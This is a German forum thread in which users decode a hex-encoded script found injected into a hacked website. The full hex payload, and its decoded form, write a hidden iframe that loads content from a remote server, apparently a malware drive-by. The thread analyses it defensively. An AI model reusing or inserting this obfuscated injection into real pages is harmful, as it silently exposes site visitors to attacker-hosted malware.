Ergebnis 1 bis 9 von 9

Thema: Was macht dieses Java Script (Virus??)

Hybrid-Darstellung

Vorheriger Beitrag Vorheriger Beitrag   Nächster Beitrag Nächster Beitrag
  1. #1
    Erfahrener Benutzer Avatar von bulli
    Registriert seit
    06.01.2007
    Beiträge
    234
    Sowas liebe ich xD so richtig verwirrende Funktionen.
    Schön, das ich was gefunden habe, was dir Spaß macht^^. Ne, also erst mal danke, weil ich habe keinen Plan von Java Script, aber so wie ich es beurteilen kann, entschlüsselt diese Script, den langen String 43524950543E77[..]43E und gibt diesen aus. und fals wirklich jemanf Lust hat das zu entschlüssel oder auch immer, der Sring orginal ist ohne Leerzeichen (nicht so wie ins Gremlins Lösung)

    Hier nochmal nur den String:
    Code:
    3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D37366163633138636339207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313330343234292B2761363764643166306163625C272077696474683D343736206865696768743D323734207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E

  2. #2
    Erfahrener Benutzer Avatar von Gremlin
    Registriert seit
    05.07.2006
    Beiträge
    5.206
    der Sring orginal ist ohne Leerzeichen (nicht so wie ins Gremlins Lösung)
    Achsoooo na und ich hab mich schon gewundert... *mal kurz Router abschalt und weiter probier*
    Diskutiere nie mit Idioten - sie holen Dich auf ihr Niveau und schlagen Dich dort mit Erfahrung!



  3. #3
    Erfahrener Benutzer Avatar von Gremlin
    Registriert seit
    05.07.2006
    Beiträge
    5.206
    Hab den Code geknackt xD war ein HEX String der zu einem normalen ascii Text macht dabei rausgekommen ist folgendes:

    Code:
    <SCRIPT>window.status='Done';document.write('<iframe name=76acc18cc9 src=\'http://77.***.133.188/.if/go.html?'+Math.round(Math.random()*130424)+'a67dd1f0acb\' width=476 height=274 style=\'display: none\'></iframe>')</SCRIPT>

    Die IP die aufgerufen wird gehört zu einem Rechner in Russland
    hab 3 Zahlen weggemacht damit es keiner aufruft ^^
    Diskutiere nie mit Idioten - sie holen Dich auf ihr Niveau und schlagen Dich dort mit Erfahrung!



  4. #4
    Erfahrener Benutzer Avatar von bulli
    Registriert seit
    06.01.2007
    Beiträge
    234
    Danke,

    und was war auf dem server, irgend ein virus??

  5. #5
    Erfahrener Benutzer Avatar von Gremlin
    Registriert seit
    05.07.2006
    Beiträge
    5.206
    Ich habe ihn nicht aufgerufen, zu gefährlich, aber ich gehe davon aus.
    Diskutiere nie mit Idioten - sie holen Dich auf ihr Niveau und schlagen Dich dort mit Erfahrung!



  6. #6
    Erfahrener Benutzer
    Registriert seit
    20.06.2007
    Beiträge
    1.905
    was mich immer noch wunndert ist woher kommt das in deine datei bwz andere dateien , wenn du es nicht reingemacht hast ??
    weil von sowas habe ich 0 PLAN

    mfg
    adi

  7. #7
    Erfahrener Benutzer Avatar von bulli
    Registriert seit
    06.01.2007
    Beiträge
    234
    ganz einfach, da hat jemand meine webspace gehackt, und noc hwas , mein passwort war nicht sehr einfach zu erraten, mit sehr vielen sonderzeichen.

    Wie man sieht, es kann wirklich jeden treffen.

Ähnliche Themen

  1. Suche dieses Addon...
    Von Hansir im Forum Scripte
    Antworten: 4
    Letzter Beitrag: 24.03.2017, 00:25
  2. Closed. Alles wiederi n ordnung!!!! (ich mag dieses Forum)
    Von Benni125 im Forum Support zum VMSone
    Antworten: 4
    Letzter Beitrag: 04.01.2011, 07:42
  3. [HTML/CSS/JS] Wie heißt dieses Menü?
    Von eXcite im Forum [HD] Programmieren
    Antworten: 8
    Letzter Beitrag: 10.08.2010, 20:15
  4. ICQ Virus-Spiel
    Von Gremlin im Forum Talk, talk, talk...
    Antworten: 11
    Letzter Beitrag: 18.03.2009, 18:51
  5. 10 Mio Lose die zur Lösung dieses Probs beitragen
    Von loseclub im Forum Support zum VMSone
    Antworten: 4
    Letzter Beitrag: 18.03.2007, 18:46

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •